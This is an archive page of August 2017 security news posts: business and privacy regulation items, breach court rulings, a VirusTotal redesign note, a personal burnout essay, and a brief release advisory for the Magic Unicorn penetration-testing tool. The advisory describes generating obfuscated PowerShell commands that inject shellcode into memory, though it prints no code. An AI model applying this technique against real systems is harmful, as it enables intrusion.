Monthly Archives: August 2017

Main Takeaways for CIOs from the Global C-Suite Study

Technological advances are transforming the way we connect, disrupting the status quo and creating huge turbulence. Industries are converging, and new opportunities and threats are emerging, as never before.

The pace of change is top of mind for CIOs. We live in an age where technology is nearly obsolete by the time it has been implemented and deployed. Gone are the days of 5-year and 7-year technology deployment plans, instead CIOs must oversee a near-continuous digital transformation of their enterprise, constantly. Add to that the critical nature of today’s technology infrastructure — i.e. can your business run without computers, networks, or the Internet — and you get a good sense for the level of stress CIOs are facing today.

In 2016, IBM’s Institute for Business Value (IBV) sought to explore the CIO’s perspective, , as part of a wider study focusing on the C-Suite. For the CIO angle, the IBV study interviewed 1,805 CIOs from around the world. The study sought to answer what the CIOs at the most successful enterprises do differently than their peers. They found a small, but distinctive group, representing about 4% of CIOs. Compared to the rest of the pack, this small group, termed the Torchbearers, stood out by their ability to be “creating intelligent, agile cultures; wising up to the needs of customers; and rewiring the way their organizations reason.” At the other extreme stood a large chunk of respondents (35%), termed Market-Followers for their lower market profile and stemming from less financially successful organizations.

When it comes to the factors that worry CIOs, 77% are worried about “the disruptive influence of new technologies” and the inability to see the next competitor in time to be able to react to them, a concern echoed by the rest of the C-Suite. Which new technologies did CIOs expect to have the most impact? They pointed to mobile solutions (71%), cloud computing (66%), and the Internet of Things (61%).

The Torchbearer Secret to Success?

No business can remain relevant by making ‘tweaks.’ The only way to stay ahead of disruptive change is to embrace it, which means being able to develop and release new products and services within weeks or even days.IBM IBV 2016 Global C-suite Study - The CIO Point of View

CIOs know that to be able to thrive — or just survive — in an era of converging industries, global competition, and high-speed innovation, they need to move towards technology investments that provide their organizations with insight and foresight, instead of a rear-view mirror vision of progress and capabilities. Seventy-one percent of Torchbearer CIOs consider the “strategic implications of new technologies,” looking to save costs but also add to the bottom line by stimulating innovation. But these CIOs also know that a traditional implementation model won’t cut it, which is why 90% of Torchbearer CIOs support agile innovation, compared to just 36% of Market-Follower CIOs.

CIOs today know they must continue to watch operating costs — in many cases do more with less — yet also provide great service quality, minimal downtime, increased agility, while also ensuring the security of the organization’s data. These are tall orders, and CIOs know that they do not have the in-house capability to deliver all these traits simultaneously.

Torchbearer CIOs are more likely to form partnerships to reap the full benefits of technological improvements. They realize the benefits of collaboration with others, not only leveraging their systems and capabilities to provide both the level and the range of services that are required for the organization to compete today, but also to continue to be competitive tomorrow. Yet all these systems and data are likely to use different operating platforms, and thus need to be integrated.

Takeaways for CIOs

But in order to provide this agility, CIOs need to rethink how they plan for and use technology to meet the ever-changing needs of the organization. Unless they have the luxury of time and the ability to manually integrate disparate systems, CIOs need help to improve the way they plan and manage the strategy around the automation and integration of IT infrastructure. This is where partnering with world-class enterprise service providers comes in. For example, in May 2017, the Everest Group named IBM as the Leader in IT Infrastructure Automation. They also pointed to IBM’s recent successes in leveraging cognitive computing to improve the way IT services are planned for, implemented, and delivered.

The most successful CIOs fully appreciate the need to forge alliances with the rest of the C-Suite, and they never lose focus on the value that they bring to all aspects of the business, from IT as critical business infrastructure, to maintaining a watchful eye over data, but also to investing in tools and technologies that will extract business intelligence out of the mountains of data. When it comes to competing and thriving in the global marketplace, Torchbearer CIOs have a strong focus on continuous technology improvements to not only drive efficiencies (e.g. savings achieved by leveraging cloud solutions), but also to provide insight and foresight, which requires leveraging technologies like cloud computing and cognitive computing (e.g., IBM Watson).
Like the rest of the C-Suite, CIOs know the pressure to provide better analytics. However, such analytics aren’t just limited to sales and marketing trends and results. Even IT can benefit from better insights into how current technology is or isn’t enabling the business to be more competitive. The question is, how are CIOs going to implement this agility, this capability to continuously adapt to change, and drive better performance and (technology) investment decisions. CIOs should look for an integration and automation partner entity that supports multiple platforms and ecosystems, supports automation, and that can provide the invaluable analytics needed to monitor service levels and drive improvements.
This post was brought to you by IBM Global Technology Services. For more content like this, visit ITBizAdvisor.com

Enterprise Security Weekly #59 – Protect the Data

Michael and Matt join Paul to discuss security operations, endpoint protection, enterprise networking monitoring, and the latest enterprise security news on this episode of Enterprise Security Weekly!Full Show Notes: https://wiki.securityweekly.com/ES_Episode59Visit https://www.securityweekly.com for all the latest episodes!

IoT privacy: 30 ways to build a security culture

Much work still must be done before the industrial and municipal Internet of Things (IoT) becomes widely adopted outside of the circle of innovators. One field, privacy, well understood by the public and private sector in the context of the cloud, PCs and mobile, is in the early stage of adaptation for the IoT.

The sheer volume of data that will be collected and the new more granular architecture of the IoT present new privacy concerns that need to be resolved on an equal scale as the platform’s forecasted growth.

A demonstration of this new aspect of privacy and compliance is the Privacy Guidelines for Internet of Things: Cheat Sheet, Technical Report (pdf) by Charith Perera, researcher at the Newcastle University in the U.K. The nine-page report details 30 points about implementing strong privacy protections. This report is summarized below.

To read this article in full, please click here

VirusTotal gets a new hairdo

Being geeks in a world of executable disassemblies, shell scripts, memory dumps and other beautiful matrix like interfaces, it is no secret that at VirusTotal we have never been great artists. This said, many of you may have noticed that we have taken some time to refresh our public web site. Design is a matter of taste and so we acknowledge that while some will love it, some others won't. However, we think all of our users will be excited about some technical improvements that come along with this refresh, and so we wanted to be sure to call those out.

First of all, we dived into this redesign exercise in order to take advantage of new front-end architecture concepts such as web components. By making use of Polymer, we intend to create basic building blocks that will allow us to operate in a more agile fashion going forward, hopefully making it easier to create new features that you may all enjoy.

Under the hood we have placed a front-end cache layer that allows us, under certain circumstances, to load file and URL reports as if the data was stored locally on your machine, instantaneously. For instance, if you take a look at reports that contain lists of files or URLs, e.g.
https://www.virustotal.com/#/domain/drive.google.com
you may click on several files in the Downloaded files section and you will notice that after a first template load, subsequent file reports load immediately; the file objects appearing on lists are now locally cached via your browser's local storage. As you dive into multiple threat reports you may also feel lighter transitions thanks to this revamped site being mostly a single page application.

We have also acknowledged the fact that analysts and researchers like to see as much information as possible about a threat condensed into as little space as possible, this is why we have reduced unnecessary paddings, removed merely decorative icons, compacted detections into two columns, etc. It is also the reason behind introducing file type icons so that we can communicate at a glance as much details as possible:


https://www.virustotal.com/#/file/072afa99675836085893631264a75e2cffd89af568138678aa92ae241bad3553/detection
https://www.virustotal.com/#/file/82d763c76918d161faaca7dd06fe28bd3ececfdb93eced12d855448c1834a149/detection
We would like to thank our friends over at Freepik and Flaticon for designing such a rich set of icons for us.

Ease of data communication and comprehension also explains why certain new sections grouping details of the same nature have appeared, e.g. the file history section:


This section ties together all the date related information that we have about a file, including submission dates to VirusTotal, date metadata shared by partners such as Sysinternals' tool suite, file signature dates, modification date metadata contained in certain file formats such as ZIP bundles, etc. Many of these details were formerly spread over different sections that made it difficult to get a clear picture of a file under study.

We have also taken a shot at some usability improvements. You will notice that we now have an omnibar that allows users to search or submit files from any page within VirusTotal, no matter whether you are on a file, domain, IP address or URL report, you can refer to the top bar in order to continue your investigations. Similarly, you can always drag and drop a file in any view in order to trigger a file scan. By the way, we now accept files up to 256MB in size, leaving behind the former 128MB limitation.

Usability is also the reason why file and URL reports now include a floating action button that allows users with privileged accounts to act on the file in VirusTotal Intelligence, for example, by launching a similar file search in order to pinpoint other variants of your interest.


Finally,  we also wanted to spend some time making sure that certain technical features would be understood by non-technical audiences, this is why when you now hover over the headings or subheadings of the different detail sections you get descriptive tooltips:



Better descriptions and inline testing forms can also be found in our  new API documentation and help center

As you can see, what looked merely like a subtle aesthetic change hides certain unnoticed functionality improvements that we hope will make your research smoother. We feel very excited about the transition to web components, as this will allow us to reuse basic building blocks and will speed up future coding efforts. There is still a lot of work to do as we have not fully rewritten the entire site: group and consumption sites or private views such as Intelligence are now entering our redesign kitchen. As usual, we would love to read your suggestions and ideas so that new iterations match your expectations, please share your feedback.

P.S. You may have noticed that our logo has morphed from a sigma into a sigma-flag symbiosis; there is a nice little story to it. The sigma represented the aggregation of detection technologies, and in the security field we often use the term flag in order to detect or mark a file as suspicious, hence, the new logo represents both the aggregation and flagging in one unique visual component.

China Releases Draft Guidelines on De-Identification of Personal Information

Recently, the National Information Security Standardization Technical Committee of China published a draft document entitled Information Security Technology – Guidelines for De-Identifying Personal Information (the “Draft Guidelines”). The Draft Guidelines are open for comment from the general public until October 9, 2017.

The Draft Guidelines provide a voluntary technical specification, the purpose of which is to provide guidance to data processers on the de-identification of personal information. The Draft Guidelines specify the purposes, principles and procedures for the de-identification of personal information. They also provide an introduction to common de-identification technologies, such as sampling, aggregation and cryptographical tools, and an introduction to common de-identification models, such as the K-anonymity model and the differential privacy model.

According to the Draft Guidelines, the de-identification of personal information should follow the following principles:

  • the de-identification must be in compliance with laws and regulations in relation to the protection of personal information;
  • the protection of personal information has priority over the use of the de-identified data;
  • measures should be adopted that reflect both technical and management approaches when conducting a de-identification of personal information;
  • software tools should be used; and
  • after the de-identification of personal information has been completed, regular reassessments should be adopted.

The Draft Guidelines also provide key steps for the de-identification of personal information, including isolating the identifiers using methods such as manual analysis, choosing models for the de-identification of personal information, verifying the security and usefulness of the data after its de-identification, and supervising the process of de-identification.

Record Breach Settlement in Anthem Class Action Receives Judge Approval

On August 25, 2017, U.S. District Judge Lucy Koh signed an order granting preliminary approval of the record class action settlement agreed to by Anthem Inc. this past June. The settlement arose out of a 2015 data breach that exposed the personal information of more than 78 million individuals, including names, dates of birth, Social Security numbers and health care ID numbers. The terms of the settlement include, among other things, the creation of a pool of funds to provide credit monitoring and reimbursement for out-of-pocket costs for customers, as well as up to $38 million in attorneys’ fees. Anthem will also be required to make certain changes to its data security systems and cybersecurity practices for at least three years.

In granting preliminary approval of the settlement agreement, the court stated that the terms of the settlement “fall within the range of possible approval as fair, reasonable, and adequate” and also preliminarily certified the settlement class. KCC, the settlement administrator designated by the parties, will provide notice of the proposed settlement to class members by October 30. After notice is completed, class members will have the opportunity to object or opt-out of the settlement until December 29, 2017. The final approval hearing will be held on February 1, 2018.

Hack Naked News #138 – August 29, 2017

Sparring government agencies, Microsoft patches a patch of a patch, Intel chips and backdoors, SMS authentication begone, and more. Jason Wood of Paladin Security discusses scaling back data demand on this episode of Hack Naked News!Full Show Notes: https://wiki.securityweekly.com/HNNEpisode138Visit https://www.securityweekly.com for all the latest episodes!

New Data Processing Notice Requirements Take Effect in Russia

As reported in BNA Privacy Law Watch, on August 22, 2017, the Russian privacy regulator, Roskomnadzor, announced that it had issued an order (the “Order”), effective immediately, revising notice protocols for companies that process personal data in Russia. Roskomnadzor stated that an earlier version of certain requirements for companies to notify the regulator of personal data processing was invalidated by the Russian Telecom Ministry in July.

The Order requires companies to notify Roskomnadzor in advance of personal data processing, including information on safeguards in place to prevent data breaches and whether the company intends to transfer data outside Russia (and, if so, the countries to which the data will be transferred). Companies must also confirm their compliance with Russia’s data localization law, which requires that companies processing personal data of Russian citizens store that data on servers located within Russia. In conjunction with the Order, Roskomnadzor released a new notification form that companies may use to communicate with the regulator.

Introducing Behavioral Information Security – The Falcon’s View

I recently had the privilege of attending BJ Fogg's Behavior Design Boot Camp. For those unfamiliar with Fogg's work, he started out doing research on Persuasive Technology back in the 90s, which has become the basis for most modern uses of technology to influence people (for example, use of Facebook user data to influence the 2016 US Presidential Election). The focus of the boot camp was around "behavior design," which was suggested to me by a friend who's a leading expert in modern, progress security awareness program management.

Thinking about how best to apply this new-found knowledge, I've been mulling opportunities for application of Fogg models and methods. Suddenly, it occurred to me, "Hey, you know what we really need is a new sub-field that combines all aspects of security behavior design, such as security awareness, anti-phishing, social engineering, and even UEBA." I concluded that maybe this sub-field would be called something like "behavioral security" and started doing searches on the topic.

Well, low-and-behold, it already exists! There is already a well-established sub-field within information security (infosec) known as "Behavioral Information Security." Most of the literature I've found (and there's a lot in academia) has popped-up over the past 5 years or so. However, I did find a reference to "behavioral security" dating back to May 2004 (see "Behavioral network security: Is it right for your company?").

Going forward, I believe that organizations and standards should stop listing "security awareness" as a single line item requirement, and instead pivot to the expanding domain of "behavioral infosec." NIST CSF would be a great place to start (though I'm assuming it's too late for the v1.1 release, expected sometime soon). Nonetheless, I will be using this phrasing and description going forward.

The inevitable question you might have is, "How do you define the domain/sub-field of Behavioral Information Security?" To me, the answer is quite simple: Any practice or capability that monitors or seeks to modify human behavior to reduce risk or improve security falls under behavioral infosec. These practice areas would include everything from modern, progressive security education, training, and awareness programs (these are programs well beyond posters and blind anti-phishing, including developer education tied to appsec testing data), progressive anti-phishing programs (that is, those that baseline and then measure impact), all forms of social engineering (including red team testing, blue team testing, etc.), and user behavior monitoring through tools like UEBA (User and Entity Behavior Analytics).

Behavioral InfoSec Engineering programs and teams should be instantiated that are charged with these practice areas (definitely security awareness and various testing, measuring, and reporting practices). Personnel should be suitably trained, not just in analytical areas, but also in technical areas in order to best develop technical content and practices designed to impact human behavior.

Lastly, why human behavior as a focus? Because reports (like VzB DBIR) consistently report year after year after year that one wrong click by a human can break an entire security chain. Thus, we need to help people make better decisions. This notion is also very DevOps-friendly thinking. We should not want to see large security programs built and maintained within organizations, but rather must work to thoroughly embed as many security practices and decisions as possible within non-security teams in order to improve security overall (this is something emphasized in DevSecOps programs). Security resources will never scale sufficiently on their own, which means we have to scale in other ways.

As an added bonus, to see the power of behavior design, I strongly recommend trying out BJ Fogg's "Tiny Habits" program, which is freely available here: http://tinyhabits.com/

cheers and good luck!

Confessions of an InfoSec Burnout – The Falcon’s View

Soul-crushing failure.

If asked, that is how I would describe the last 10 years of my career, since leaving AOL.

I made one mistake, one bad decision, and it's completely and thoroughly derailed my entire career. Worse, it's unclear if there's any path to recovery as failure piles on failure piles on failure.

The Ground I've Trod

To understand my current state of career decrepitude, as well as how I've seemingly become an industry pariah...

I have worked for 11 different organizations over the past 10 years. I left AOL in September 2007, right before a layoff (I should have waited for the layoff and gotten a package!). I had been there for more than 3.5 years and I was miserable. It was a misery of my own making in many ways. My team manager had moved up the ranks, leaving an opening. All my teammates encouraged me to throw my hat in the ring, but I demurred, telling myself I simply wasn't ready to manage. Oops. Instead, our new manager came through an internal process, and immediately made life un-fun. I left a couple months later.

When I left AOL, it was to take a regional leadership role in BT-INS (BT Global Services - they bought International Network Services to build-out their US tech consulting). A month into the role as security lead for the Mid-Atlantic, where I was billable on day 1, the managing director left and a re-org merged us in with a different region where there was already a security lead. 2 of 3 sales reps left and the remaining person was unable and unwilling to sell security. I sat on the bench for a long time, traveling as needed. An idle, bored Ben is a bad thing.

From BT I took a leadership role with this weird tech company in Phoenix. There was no budget and no staff, but I was promised great things. They let me start remote for a couple months before relocating. I knew it was a bad fit and not a good company before we made the move. I could feel it in my gut. But, I uprooted the family in the middle of the school year (my wife is an elementary teacher) and went to Phoenix, ignoring my gut. 6 months later they eliminated the position. The fact is that they'd hired a new General Counsel who also claimed a security background (he had a CISSP), and thus they made him the CISO. The year was 2009, the economy was in tatters after the real estate bubble had burst. We were stranded in a dead economy and had no place to go.

Thankfully, after a month of searching, someone threw me a life-line and I promptly started a consulting gig with Foreground Security. Well, that was a complete disaster and debacle. We moved back to Northern Virginia and my daughter immediately got sick and ended up in the hospital (she'd hardly had a sniffle before!). By the time she got out of the hospital I was sicker than I'd ever been before. The doctors had me on a couple different antibiotics and I could hardly get out of bed. This entire time the president of the company would call and scream at me every day. Literally, yelling at the top of his lungs over the phone. Hands-down the most unprofessional experience I'd had. The company partnership subsequently fell apart and I was kacked in the process. I remember it clearly to this day: I'm at my parents house in NW MN over the winter holidays and the phone rings. It's the company president, who starts out by telling me they'd finally had the kid they were expecting. And, they're letting me go. Yup, that's how the conversation went ("We had a baby. You're termed.").

Really, being out of Foreground was a relief given how awful it had been. Luckily they relocated us no strings attached, so I didn't owe anything. But, I once again was out of a job for the second time in 3 months. I'd had 3 employers in 2009 and ended the year unemployed.

In early 2010 I was able to land a contract gig, thinking I'd try a solo practice. It didn't work out. The client site was in Utah, but they didn't want to pay for a ton of travel, so I tried working remotely, but people refused to answer the phone or emails, meaning I couldn't do the work they wanted. The whole situation was a mess.

Finally, I connected with Peter Hesse at Gemini Security Solutions to do a contract-to-hire tryout. His firm was small, but had a nice contract with a large client that helped underpin his business. He brought me in to do a mix of consulting and biz dev, but after a year+ of trying to bring in new opportunities (and have them shot down internally for various reasons), I realized that I wasn't going to be able to make a difference there. Plus, being reminded almost daily that I was an expensive resource didn't help. I worked my butt off but in the end it was unappreciated, so I left for LockPath.

The co-founders of LockPath had found me when I was in Phoenix thanks to a paper I'd written on PCI for some random website. They came out to visit me and told me what they were up to. I kept in touch with them over the years, including through their launch of Keylight 1.0 on 10/10/10. I somewhat forced my way into a role with them, initially to build a pro svcs team, but that got scrapped almost immediately and I ended up more in a traveling role, presenting at conferences to help get the name out there, as well as doing customer training. After a year-and-a-half of doing this, they hired a full-time training coordinator who immediately threw me under the bus (it was a major wtf moment). They wanted to consolidate resources at HQ and moving to Kansas wasn't in the cards, so seeing the writing on the wall I started a job search. Things came to an end in mid-May while I was on the road for them. I remember it clearly, having dropped my then-3yo daughter with the in-laws the night before, I had just gotten into my hotel room in St. Paul, MN, ahead of Secure360 and the phone rang. I was told it was over, but he was going to think about it overnight. I asked "Am I still representing the company when I speak at the conference tomorrow?" and got no real answer, but was promised one first thing the next morning. That call never came, so I spoke to a full room the next morning and worked the booth all that day and the morning after that. I met my in-laws for lunch to pick-up my kiddo, and was sitting in the airport awaiting our flight home when the call finally came in delivering the final news. I was pretty burned-out at that time, so in many ways it was welcome news. Startup life can be crazy-intense, and I thankfully maintain a decent relationship with the co-founders today. But those days were highly stressful.

The good news was that I was already in-process with Gartner, and was able to close on the new gig a couple weeks later. Thus started what I thought would be one of my last jobs. Alas, I was wrong. As was much with my time there.

It bears noting here before I go any further an important observation: The onboarding experience is all-important. If you screw it up, then it sets a horrible tone for the entire gig, and the likelihood of success drops significantly. If onboarding is professional and goes smoothly, then people will feel valued and able to contribute. If it goes poorly, then people will feel undervalued from the get-go and they will literally start from an emotional hole. Don't do this to people! I don't care if you're a startup or a Fortune 50 large multi-national. Take care of people from Day 1 and things will go well. Fail at it and you'd might as well stop and release them asap.

Ok, anyway... back to Gartner. It was a difficult beginning. I was assigned a mentor, per their process, but he was gone 6 of the first 9 weeks I was there. I was sent to official "onboarding training" the end of August (the week before Labor Day!) despite having been there for 2 months by that time. I was not prepped at all before going to onboarding, and as it turns out I should have been. Others showed up with documents to be edited and an understanding of the process. I showed up completely stressed out, not at all ready to do the work that was expected, and generally had a very difficult time. It was also the week before Labor Day, which at the time meant it was teacher workshops, and I was on the road for it with 2 young kids at home. Thankfully, the in-laws came and helped out, but suffice to say it was just really not good all-around.

I really enjoyed the manager I worked for initially, but all that changed in February 2014 when my former mentor, with whom I did not at all get along, became the team manager. The stress levels immediately spiked as the focus quickly shifted to strong negativity. I had been struggling to get paper topics approved and was fighting against the reality that the target audience for Gartner research is not the leading edge of thinking, but the middle of the market. It took me nearly a full year to finally get my feet under me and start producing at an appropriate pace. My 1 yr mark roughly corresponded with the mid-year review, which was highly negative. By the end of the year I finally found my stride and had a ton of research in the pipeline (most of which would publish in early 2015). Unfortunately, the team manager, Captain Negative, couldn't see that and gave me one of the worst performance reviews I've ever received. It was hands-down the most insulted I'd ever been by a manager. It seemed very clear from his disrespectful actions that I wasn't wanted there, and so I launched an intensive job search. Meanwhile, I published something like 4 papers in 6 weeks while also having 4 talks picked up for that year's Security & Risk Management Conference. All I heard from my manager was negativity despite all that progress and success. I felt like shit, a total failure. There were no internal opportunities, so outward I looked, eventually landing at K12.

Oh, what a disaster that place was. K12 is hands-down the most toxic environment I've ever seen (and I've seen a lot!). Literally, all 10 people with whom I'd interviewed had lied to me - egregiously! I'd heard rumblings of changes in the executive ranks, but the hiring manager assured me there was nothing that would affect me. A new CIO - my manager's boss - started the same day I did. Yup, nothing that would affect me. Ha. Additionally, it turns out that they already had a "security manager" of sorts working in-house. He wasn't part of the interview process for my "security architect" role. They said they were doing DevOps, but it was just a side pilot that wasn't getting anywhere. Etc. Etc. Etc. Suffice to say, it was really bad. I frankly wondered how they were still in business, especially in light of the constant stream of lawsuits emanating from the states where they had "online public schools." Oy...

Suffice to say, I started looking for work on Day 1 at K12. But, there wasn't much there, and recruiters were loathe to talk to me given such a short stint. Explanations weren't accepted, and I was truly stuck. The longer I was there, the worse it looked. Finally, my old manager from AOL reached out as he was starting a CISO role at Ellucian. He rescued me and in October 2015 I started with them in a security architect role.

There's not much I can say about my experience at Ellucian. Things seemed ok at first, but after a CIO change a few months in, plus a couple other personnel issues, things got wonky, and it became clear my presence was no longer desired. When your boss starts cancelling weekly 1-on-1 meetings with you, it becomes pretty clear that he doesn't really want you there. New Context reached out in May 2016 and offered me an opportunity to do research and publishing for them, so I jumped at it and got the heck out of dodge. It turns out, this was a HUGE mistake, too...

There's even less I can say about New Context... we'll just put it at this: Despite my best efforts, I was never able to get things published due to a lack of internal approvals. After a year of banging my head against the wall, my boss and I concluded it wasn't going to happen, and they let me go a couple weeks later.

From there, I launched my own solo practice and signed what was to be a 20-wk contract with an LA-based client. They had been chasing me for several months to come help them out in a consulting (staff augmentation, really) capacity. I closed the deal with them and started on July 31st of this year. That first week was a mess with them not being ready for me on day 1, then sending me a botched laptop build on day 2, and then finally getting me online on day 3. I flew to LA to be on-site with them the following week and immediately locked horns with the other security architect. That first week on-site was horribly stressful. Things had finally started leveling off last wk, and then yesterday (Monday 8/28/17) they called and cancelled the contract. While I'm disappointed, it's also a bit of a relief. It wasn't a good fit, it was a very difficult client experience, and overall I was actively looking for new opportunities while I did what I could for them.

Shared Culpability or Mea Culpa?

After all these years, I'm tired of taking the blame and being the seemingly constant punchline to some joke I don't get. I'm tired, I'm burned-out, I'm frustrated, I'm depressed, and more than anything I just don't understand why things have gone so completely wrong over the past 10 years. How could one poor decision result in so much career chaos and heartache? It's astonishing. And appalling. And depressing.

I certainly share responsibility in all of this. I tend to be a fairly high-strung person (less so over the years) and onboarding is always highly stressful for me. Increasingly, employers want you engaged and functional on Day 1, even though that is incredibly unrealistic. Onboarding must be budgeted for a minimum of 3-6 months. If a move is involved, then even longer! Yet nobody is willing to allow that any more. I don't know if it's mythology or downward pressure or what... but the expectations are completely unreasonable.

But I do have a responsibility here, and I've certainly not been Mr. Sunshine the past few years, which means I tend to come off as extremely negative and sarcastic, which can be off-putting to people. Attitude is something I need to focus on when starting, and I need to find ways to better manage all the stress that comes with commencing a new gig.

That said, I also seem to have a knack for picking the wrong jobs. This even precedes my time at AOL, which is really a shining anchor in the middle of a turbulent career. Coming into the workforce just before the DOT-COM bubble burst, I've been through lots of layoffs and turmoil. I simply have a really bad track record of making good employment choices. I'm not even sure how to go about fixing that, short of finding people to advise me on the process.

However, lastly, it's important for companies to realize that they're also failing employees. The onboarding process is immensely important. Treating people respectfully and mindfully from Day 1 is immensely important. Setting reasonable expectations is immensely important. If you do not actively work to set your personnel up for success, then it is extremely unlikely that they'll achieve it! And even in this day and age where companies really, truly don't value personnel (except for execs and directors), it must be acknowledged that there is a significant cost in lost productivity, efficiency, and effectiveness that can be directly tied to employee turnover. This includes making sure managers are reasonably well trained and are actually well-suited to being managers. You owe it to your employees to treat them as humans, not just replaceable cogs in a machine.

Where To Go From Here?

The pull of deep depression is ever stronger. Resistance becomes evermore difficult with each successive failure. I feel like I cannot buy a break. My career is completely off-track and I decreasingly see a path to recovery. Every morning is a struggle to get up and look for work yet again. I feel like I've been doing this almost constantly for the past 10 years. I've not been settled anywhere since AOL (maybe BT).

I initially launched a solo practice, Falcon's View Consulting, to handle some contracts. And, that's still out there if I need it. However, what I really need is a full-time job. With a good, stable company. In a role with a good manager. A role that eventually has upward mobility (in order to get back on track).

Where that role is based I really do not care (my family might). Put me in a leadership role, pay me a reasonable salary, and relocate me to where you need me. At this point, I'm willing to go to bat and force the family to move, but you gotta make it easy and compelling. Putting me into financial hardship won't get it done. Putting me into a difficult position with no support won't get it done. Moving me and not being committed to keeping me onboard through the most stressful times won't get it done.

I'm quite seriously at the end of my rope. I feel like I have about one more chance left, after which it'll be bankruptcy and who knows what... I've given just about everything I can to this industry, and my reward has been getting destroyed in the process. This isn't sustainable, it isn't healthy, and it's altogether stupid.

I want to do good work. I want to find an employer that values me that I can stay with for a reasonable period of time. I've never gone into any FTE role thinking "this is just a temporary stop while I find something better." I throw my whole self into my work, which is - I think - why it is so incredibly painful when rejection and failure final happen. But I don't know another way to operate. Nor should anyone else, for that matter.

Two roads diverged in the woods / And I... I took the wrong one / And that has made all the difference

FTC Posts Sixth Blog in Its “Stick with Security” Series

On August 25, 2017, the FTC published the sixth blog post in its “Stick with Security” series. As we previously reported, the FTC will publish an entry every Friday for the next few months focusing on each of the 10 principles outlined in its Start with Security Guide for Businesses. This week’s post, entitled Stick with Security: Segment your network and monitor who’s trying to get in and out, illustrates the benefits of segmenting networks and monitoring the size and frequency of data transfers.

The practical guidance provides useful examples on how to:

  • Segment your Network: Companies today can link multiple devices together across a single network. While legitimate business reasons exist for such linkage, businesses should consider whether there is sensitive information on their networks requiring special treatment. Segmenting a network can include having separate areas of the network protected by firewalls which reject unnecessary traffic. This can reduce the impact of a breach, should it occur, by isolating it to a limited part of the system. For example, a company that maintains confidential client information can use a firewall to segment this part of its network from the portion of its network containing corporate website data.
  • Monitor Activity on your Network: Businesses should also monitor who is accessing, uploading or downloading information on the network. It is imperative to respond quickly if abnormal activity is detected. Numerous tools are available to warn businesses about attempts to access their networks without authorization, as well as to spot malicious software installs and suspicious data exfiltration.

The guidance concludes by noting the key lesson for businesses is to make things more difficult for hackers and this can be done by segmenting their networks and using readily accessible tools to monitor who is entering their system and what is leaving.

The FTC’s next blog post, to be published on Friday, September 1, will focus on securing remote access to your network.

To read our previous posts documenting the series, see FTC Posts Fifth Blog in its “Stick with Security” Series, FTC Posts Fourth Blog in its “Stick with Security” Series, FTC Posts Third Blog in its “Stick with Security” Series and FTC Posts Second Blog in its “Stick with Security” Series.

Toolsmith Release Advisory: Magic Unicorn v2.8

David Kennedy and the TrustedSec crew have released Magic Unicorn v2.8.
Magic Unicorn is "a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory, based on Matthew Graeber's PowerShell attacks and the PowerShell bypass technique presented by Dave and Josh Kelly at Defcon 18.

Version 2.8:
  • shortens length and obfuscation of unicorn command
  • removes direct -ec from PowerShell command
Usage:
"Usage is simple, just run Magic Unicorn (ensure Metasploit is installed and in the right path) and Magic Unicorn will automatically generate a PowerShell command that you need to simply cut and paste the PowerShell code into a command line window or through a payload delivery system."


Heralding GSoC17 Report

The summer is coming to the end as well as my GSoC17 happy days. So, now it’s time to sum up the results and say goodbye to the GSoC until the next year.

My impressions about working on the Heralding project

Working on the Heralding project was awesome experience for me. I feel I did something helpful, fun and challenging at the same time. I hadn’t wanted anything else before the summer!

read more

Eighth Circuit Finds Article III Standing Yet Affirms Dismissal of Scottrade Breach Case

On August 21, 2017, the United States Court of Appeals for the Eighth Circuit affirmed the dismissal of a putative class action arising from the Scottrade data breach. Notably, however, the Eighth Circuit did not agree with the trial court’s ruling that the plaintiff lacked Article III standing, instead dismissing the case with prejudice for failure to state a claim. 

The plaintiff sued Scottrade after an internal database was breached in late 2013 and early 2014. The plaintiff’s putative class action asserted claims for breach of express and implied contracts, unjust enrichment, declaratory judgment and violation of the Missouri Merchandising Practices Act. He claimed damages based on, among other things, the increased risk of identity fraud, the costs of mitigating that risk and the decline in value of his personal identifying information (“PII”), as well as overpayment to Scottrade for brokerage services. The trial court dismissed the case due to lack of Article III standing. The Eighth Circuit disagreed with the standing ruling, but nevertheless affirmed on different grounds raised on Scottrade’s cross-appeal.

Article III Standing for Contract Claims. The appellate court found standing only for the breach of contract and contract-related claims based on allegations that the plaintiff did not receive the full benefit of his bargain. When the plaintiff opened his Scottrade account, he signed a Brokerage Agreement and provided Scottrade with certain PII. He claimed that a portion of the fees paid in connection with the Scottrade account were used to meet Scottrade’s contractual obligations to provide data management and security to protect his PII.

When Scottrade breached those data-security related obligations, the plaintiff argued that he received services of a lesser value, and the difference between the amount he paid and the value of the actual services rendered was an actual economic injury sufficient to establish constitutional standing. The court agreed that he had satisfied Article III standing for the contract and contract-related claims, but ultimately found the allegations were insufficient to state a claim.

Failure to State a Claim. The appellate court found that “representations of [information security] conditions Scottrade will maintain are in the nature of contract recitals, and there was no alleged misrepresentation.” The court also faulted the plaintiff for not identifying any step Scottrade might have taken to protect his PII, or any applicable law or regulation to which Scottrade did not adhere. The plaintiff’s “implied premise that because data was hacked Scottrade’s protections must have been inadequate” was a naked assertion “that cannot survive a motion to dismiss.” The court stated, “[m]assive class action litigation should be based on more than allegations of worry and inconvenience.”

The court further found the plaintiff failed to plausibly allege actual damages. Because the Brokerage Agreement provided for charges based “on a per order basis,” any alleged information security failure that supposedly diminished the benefit of the plaintiff’s bargain was not plausible. The court identified additional reasons to affirm dismissal of the remainder of the claims.

Startup Security Weekly #52 – Security Startups Taste So Good

Michael and Paul discuss de-risking risk. In the news, ten tools to streamline your processes, why cash conversion matters, creating psychological safety, and updates from Cisco, Nationwide, and more on this episode of Startup Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/SSWEpisode52

Visit https://www.securityweekly.com for all the latest episodes!

NIAC Issues Recommendations to Improve Critical Infrastructure Cybersecurity

On August 22, 2017, the National Infrastructure Advisory Council (“NIAC”) issued a report entitled Securing Cyber Assets: Addressing Urgent Cyber Threats to Critical Infrastructure (“NIAC Report”). NIAC was first created in 2001 shortly after the 9/11 attacks and advises the President on information security systems in banking, finance, transportation, energy, manufacturing and emergency government services. The NIAC Report notes that sophisticated and readily available malicious cyber tools and exploits have lowered the barrier to cost and increased the potential for successful cyber attacks. According to the NIAC Report, “[t]here is a narrow and fleeting window of opportunity before a watershed, 9/11-level cyber attack to organize effectively and take bold action.”

